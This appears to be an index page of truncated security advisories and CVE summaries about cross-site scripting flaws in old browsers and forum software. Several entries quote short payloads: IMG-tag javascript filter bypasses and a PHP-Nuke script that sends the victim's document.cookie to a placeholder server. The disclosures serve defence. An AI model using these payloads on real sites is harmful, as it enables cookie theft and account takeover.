Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution

Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution source: https://www.securityfocus.com/bid/6780/info Microsoft Internet Explorer implements the showHelp function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too...

CVE-2002-1931

Cross-site scripting XSS vulnerability in PHP Arena paFileDB 1.1.3 and 2.1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the search string...

Microsoft IIS IDC Extension XSS

This IIS Server appears to be vulnerable to a cross-site scripting attack due to an error in the handling of overly-long requests on an idc file. It is possible to inject JavaScript in the URL, that will appear in the resulting page. %NASLMINLEVEL 70300 This script was written by Geoffroy Raimbau...

SECURITY.NNOV: ikonboard 3.1.1 CSS

Dear bugtraq@, Ikonboard CSS bug via IMG tag was reported long time ago for 3.0.x. The only change in Ikonboard 3.1.1 at least on sending private messages is it checks URL extension to be .gif or .jpg, so IMGjavascript:alertdocument.cookie.gif/IMG still works perfectly.... Sorry if it was already...

Proxy error messages crossite scripting

In error message URL is not escaped, it makes it possible to inject javascript into URL...

CVE-2002-0738

MHonArc 2.5.2 and earlier does not properly filter Javascript from archived e-mail messages, which could allow remote attackers to execute script in web clients by 1 splitting the SCRIPT tag into smaller pieces, 2 including the script in a SRC argument to an IMG tag, or 3 using "&=script" syntax...

Opera 6.0.x - FTP View Cross-Site Scripting

Opera 6.0.x - FTP View Cross-Site Scripting source: https://www.securityfocus.com/bid/5401/info A cross-site scripting vulnerability in Opera has been reported. When viewing the contents of an FTP site as web content, the data within tags is not sanitized. An attacker may embed javascript between...

Mozilla 1.0/1.1 - FTP View Cross-Site Scripting

source: https://www.securityfocus.com/bid/5403/info A cross-site scripting vulnerability in Mozilla has been reported. When viewing the contents of a FTP site as web content from a ftp:// URL, the directory name is included in the HTML representation. It is not adequately sanitized before this...

CVE-2001-1084

Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message...

Levcgi.coms MyGuestbook JavaScript Injection Vulnerability

| | | | | | | | | | | | | | | | | | || | | | | http://rawt.daemon.sh | | | | | | | | | | | | | | | || || || || || || || Levcgi.coms MyGuestbook JavaScript Injection Vulnerability Discovered By BrainRawt [email protected] About MyGuestbook: ------------------ Highly customizable guestbook that...

Microsoft Internet Explorer 5.5/6.0 - History List Script Injection

source: https://www.securityfocus.com/bid/4505/info A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction. Internet Explorer stores...

[Advisory] phpBB 1.4.4 still suffers from Cross Site Scripting Vulnerability

------------------------------------------------------------ itcp advisory 5 [email protected] http://www.it-checkpoint.net/advisory/5.html March 21th, 2002 - ------------------------------------------------------------ phpBB 1.4.4 still suffers from Cross Site Scripting Vulnerability...

[IMG] tag vulnerability in vBulletin

product : vbulletin versions : 2.2.2, 2.2.0 , maybe others. Probleme : One knows that if one sendings this code in private message : IMGjavascript:alert'hum';/IMG a space will be placed between "java" and "script". This filter can be by-passed : IMGjavasript:alert'hop';/IMG More details in french...

Vulnerabilities in squirrelmail

Multiple security vulnerabilties exist in SquirrelMail v 1.2.3 that allow malicious HTML messages to: send messages appearing to come from the user run arbitrary javascript Description ----------- The compose.php script allows parameters to be passed as GETs. Therefore including the following in ...

Cgisecurity Paper #4: Header Based Exploitation: Web Statistical Software Threats

Hello, Below is a paper I wrote on some threats that web statistical software faces in regards to header manipulation. I've decided to include 1 product affected by this to show that this is very possible. Product: w3perl Vendor: http://www.w3perl.com Patch: http://www.w3perl.com/download/ Upgrad...

Межсайтовый скриптинг в Aktivate Shopping System (crossite scriptiong)

Можно вставить javascript в URL запроса...

Security hole in IMessenger ( PHP-Nuke )

There is a big hole in imessenger im.php. He accept javascript... if I send scriptwindow.location.href='http://www. SERVER.com/im.php?usernameto= MYNICK &subject='+ document.cookie +'&message=message&action=send' ;/script without '' to the admin, he send his cookie. PHPNuke has been alerted...

javascript в gnut (javascript injection)

Имя разделяемого файла может содержать html-таги...

Проблемы в proxomitron (crosssite scripting)

Можно вставить javascript в URL запроса...

CVE-2001-1084

Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message...